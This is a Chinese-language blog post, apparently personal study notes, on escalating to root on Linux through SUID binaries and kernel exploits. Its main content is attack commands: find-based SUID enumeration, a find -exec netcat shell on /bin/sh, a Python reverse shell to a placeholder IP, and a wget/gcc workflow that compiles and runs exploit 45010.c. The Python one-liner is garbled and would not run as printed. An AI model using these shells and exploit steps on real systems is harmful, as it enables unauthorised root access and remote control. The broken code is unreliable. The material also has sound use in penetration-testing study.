Linux提权--SUID提权&内核漏洞本地用户提权

最新推荐文章于 2024-06-03 20:40:56 发布
最新推荐文章于 2024-06-03 20:40:56 发布
阅读量808 收藏 23
点赞数 19
分类专栏: # 权限提升 文章标签: linux 运维 服务器 安全 网络攻击模型 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138327702
版权

免责声明:本文仅做技术交流与学习,请不要乱搞破坏...

目录

SUID提权

漏洞成因

提权过程:

手工命令探针:

参考利用:

脚本探针:

LinEnum.sh

traitor

linuxprivchecker等等...

Linux命令的利用:

find命令

利用nc反弹

利用python反弹--棱角

内核漏洞本地用户提权

提权过程:

探针项目:

命令执行:

SUID提权

漏洞成因

chmod u+s 给予了 suid

            u-s 删除了 suid .(类似于windows以管理员运行,只不过Linux需要输入命令才行.)

使程序在运行中受到了 suid root 权限的执行过程导致 .

提权过程:

探针是否有 SUID(手工或脚本)--->特定 SUID 利用-利用--拿下

手工命令探针:

手工命令探针安全: 
find / -user root -perm -4000 -print 2>/dev/null
​
 find / -perm -u=s -type f 2>/dev/null
​
 find / -user root -perm -4000 -exec ls -ldb {} \;

手工---参照网址---有符合SUID命令的就可以利用.(自己排查)

参考利用:

https://gtfobins.github.io/

https://pentestlab.blog/2017/09/25/suid-executables/

脚本探针:

LinEnum.sh

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

--有就自己利用.

traitor

GitHub - liamg/traitor: :arrow_up: :fire: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sock #综合(漏洞探针(探针高危的)+信息搜集)

linuxprivchecker等等...

Linux命令的利用:

SUID Executables – Penetration Testing Lab

命令百科写的很清晰了...看百科就行~

find命令

--->利用命令,把要执行的命令写到后面就行了.

利用nc反弹
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
​
netcat -lvvp 5555
利用python反弹--棱角

[~]#棱角 ::Edge.Forum*

find xiaodi -exec python -c 'import socket,subprocess,os;s=socket.socket (socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",7777));os.dup2(s.fileno(,0); os.dup2(s.fileno0,1); os.dup2(s.fileno0,2);p=subprocess.call(["/bin/sh","-i");'\

内核漏洞本地用户提权

---这个漏洞适用于**本地提权**.

提权过程:

连接--获取可利用漏洞-->下载或上传EXP-->编译EXP-->给权限执行-拿下

探针项目:

BeRoot-Linux                    linux-exploit-suggester                    linux-exploit-suggester2         LinEnum                         (看着把项目都上传上去.)

命令执行:

chmod +x 文件     --给他一个执行权限.
​
./文件                        --运行文件.
​
###检测出漏洞之后,直接----> wget 网址     (或者自己下载后再上传)
​
###--EXP里面会教你怎么运行.
​
gcc 45010.c -o exp
​
ls
​
./exp
​
id
 

 


                

        

        

    




            

                    
            

    

      

        

            

              
                
                  金灰
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    19
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    23
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  2
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Linux系统漏洞本地提权

				
			

			

				

					xiongIT的博客
				

				

					11-23
					
					2043
					
				

			

		

		

			
				
如何预防Linux系统漏洞本地提权

			
		

	



                

              
                



	

		

			

				
					
Windows本地提权漏洞(CVE-2021-1732)复现

				
			

			

				

					锋刃科技的博客
				

				

					04-13
					
					2153
					
				

			

		

		

			
				
漏洞概述



该漏洞由函数win32kfull!xxxCreateWi ndowEx 对应用层回调返回数据校验不严导致,本地用户执行漏洞利用程序获取系统权限。



影响版本


Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Versi..

			
		

	



                


  
              

                


	

		

			

				
					
suid(特殊权限位)提权

				
			

			

				

					ZY95001的博客
				

				

					07-28
					
					1825
					
				

			

		

		

			
				
一、


			
		

	





	

		

			

				
					
CVE-2024-1086 Linux kernel nf_tables 本地提权漏洞修复方法--多种方式,亲测!!!

					
最新发布

				
			

			

				

					qq_21160025的博客
				

				

					06-03
					
					9163
					
				

			

		

		

			
				
CVE-2024-1086 Linux kernel nf_tables 本地提权漏洞

			
		

	



		

			
		



	

		

			

				
					
新Windows本地提权漏洞学习(CVE-2019-0841)

				
			

			

				

					weixin_30402085的博客
				

				

					04-16
					
					969
					
				

			

		

		

			
				
1、这是一个啥漏洞?

睁眼一看,妈呀本地提权,快加入本地提权漏洞利用包里,速度加入。github连接我就不发了。担心被认为是传播黑客工具,咱们在这里单纯学习一下漏洞的原理和部分源代码。
2、文件读写权限转命令执行权限!

为啥能提权,基本原理先说一下,这个漏洞可以让你拥有“文件读写权限转命令执行权限”的典型案例,利用一个低权限获取高权限文件的读写权限,即可利用恶意代码注入,劫持dll等方式赋予自...

			
		

	





	

		

			

				
					
Linux sudo 提权漏洞 CVE-2021-3156  复现 附exp

				
			

			

				

					god_Zeo的安全博客
				

				

					02-04
					
					1574
					
				

			

		

		

			
				
0x01 CVE-2021-3156: 缓冲区溢出漏洞
在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。
0x02 影响版本
Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1
不受影响版本
Sudo =>1.9.5p2
0x03 漏洞检测
测试环境:ubuntu:20.04
检测是否存在
s

			
		

	





	

		

			

				
					
polkit pkexec 本地提权漏洞

				
			

			

				

					sre救赎之路
				

				

					05-04
					
					937
					
				

			

		

		

			
				
2022年1月25日。

			
		

	





	

		

			

				
					
Linux提权手法总结以及 Linux提权exp集合

				
			

			

				

					02-22
				

			

		

		

			
				
首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如,历史上著名的Shellshock和Heartbleed漏洞就曾引发大规模的安全事件...

			
		

	





	

		

			

				
					
Linux提权扫描脚本

				
			

			

				

					04-28
				

			

		

		

			
				
Linux系统中,"提权"是指通过某种方式获取比当前用户权限更高的权限,通常是普通用户到root权限的提升。提权扫描脚本是用于检测系统中可能存在提权漏洞的工具,它可以帮助管理员识别和修复安全风险。这篇文档将...

			
		

	





	

		

			

				
					
权限提升-linux提权手法总结.zip

				
			

			

				

					05-08
				

			

		

		

			
				
6. **内核漏洞**:Linux内核中的安全漏洞可能允许攻击者获得root权限,比如通过本地拒绝服务(DoS)攻击、内核信息泄露等。  7. **系统调用滥用**:熟练掌握Linux系统调用的使用,攻击者可能找到滥用系统调用的方法...

			
		

	





	

		

			

				
					
linux提权代码

				
			

			

				

					06-04
				

			

		

		

			
				
4. **内核漏洞**:内核Linux的心脏,如果发现有提权漏洞,攻击者可以编写特定的exploit来获取root权限。例如,本地提权漏洞(local privilege escalation, LPE)。  5. **权限配置错误**:系统或应用的权限配置...

			
		

	





	

		

			

				
					
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1

				
			

			

				

					08-03
				

			

		

		

			
				
**案例3:Linux提权本地配合内核漏洞演示** 在Mozhe的案例中,提权过程涉及发现和利用内核漏洞。攻击者首先连接到系统,然后获取可利用的内核漏洞信息,下载或上传EXP(exploit),编译EXP,并赋予执行权限。例如,`...

			
		

	





	

		

			

				
					
CVE-2023-28252 CLFS Windows 本地提权漏洞 POC

				
			

			

				

					【Rainbow Network Technology co., LTD】
				

				

					08-23
					
					963
					
				

			

		

		

			
				
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞

			
		

	





	

		

			

				
					
CVE-2021-1732_Windows本地提权漏洞

				
			

			

				

					weixin_45715461的博客
				

				

					06-30
					
					2508
					
				

			

		

		

			
				
CVE-2021-1732_Windows本地提权漏洞

			
		

	





	

		

			

				
					
提权——Windows 本地漏洞提权

				
			

			

				

					z1756227332的博客
				

				

					03-12
					
					1071
					
				

			

		

		

			
				
当我们获得webshell 想要进行创建用户等操作的时候会发现自己的权限不够,这个时候我们就需要进行提权的操作
提权主要包含这几种方式
1.数据库提权
2.本地溢出漏洞提权
3.第三方软件提权
我们来演示一下 利用MSF来进行本地漏洞提权操作。
1.通过msf生成反弹shll进行执行反弹shll的操作
进入到kalis使用这条命令 来生成一个反弹shell 的.exe程序。
msfvenom -...

			
		

	





	

		

			

				
					
CVE-2021-3493:Overlay 文件系统 Ubuntu 本地提权漏洞分析

				
			

			

				

					个人笔记
				

				

					07-02
					
					1666
					
				

			

		

		

			
				
由于笔者已分析过 CVE-2023-0386,在此基础上,分析 CVE-2021-3493 可能更为简单。CVE-2023-0386 需要理解OverlayFS、Linux 命名空间、SetUID 位的概念;除此之外,如果你想理解 CVE-2021-3493,还需要了解Capability、Linux 文件扩展属性。当你理解了这些常见的概念之后,在手动复现这些漏洞,会有更加深刻的理解,并且可以提高对 Linux 本地提权漏洞的认知。

			
		

	





	

		

			

				
					
【权限提升】 Windows10 本地提权漏洞复现及详细分析(CVE-2021-1732)

				
			

			

				

					做自己喜欢的事,并将其发挥到极致!
				

				

					12-07
					
					4580
					
				

			

		

		

			
				
CVE-2021-1732 是蔓灵花(BITTER)APT 组织在某次被披露的攻击行动中使用的 0day 漏洞,该高危漏洞可以在本地将普通用户进程的权限提升至最高的 。属于windows系统级别的二进制漏洞

			
		

	





	

		

			

				
					
linux本地提权漏洞,漏洞预警 | Ubuntu存在本地提权漏洞(附EXP及应对措施)

				
			

			

				

					weixin_42566108的博客
				

				

					05-16
					
					396
					
				

			

		

		

			
				
今天下午,Twitter 用户 @Vitaly Nikolenko 发布消息,称 ubuntu 最新版本(Ubuntu 16.04)存在高危的本地提权漏洞,而且推文中还附上了 EXP 下载地址。Ubuntu是一个以桌面应用为主的开源GNU/Linux操作系统,基于Debian GNU/Linux。此次发布的 EXP 即为 CVE-2017-16995 Linux 内核漏洞的攻击代码。该漏洞存在于L...

			
		

	





	

		

			

				
					
权限提升:利用Linux漏洞提权

				
			

			

				

					qq_68163788的博客
				

				

					02-13
					
					2338
					
				

			

		

		

			
				
Linux漏洞提权是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的权限。这种方法通常被黑客用来获取系统管理员权限,从而可以对系统进行更深入的攻击和控制。

一种常见的Linux漏洞提权方法是利用内核漏洞内核是操作系统的核心部分,负责管理系统的资源和提供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞来提升权限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的权限。

			
		

	





	

		

			

				
					
Linux提权攻略:从信息收集到内核漏洞利用

				
			

			

				

					
				

			

		

		

			
				
"这篇文档是关于Linux提权的深度指南,涵盖了多种权限提升技术,包括信息收集、内核漏洞利用、服务权限滥用等,并强调了权限升级在攻防中的重要性。作者提醒读者,该文仅供学习研究,禁止非法攻击。"  在Linux系统中...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
金灰

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值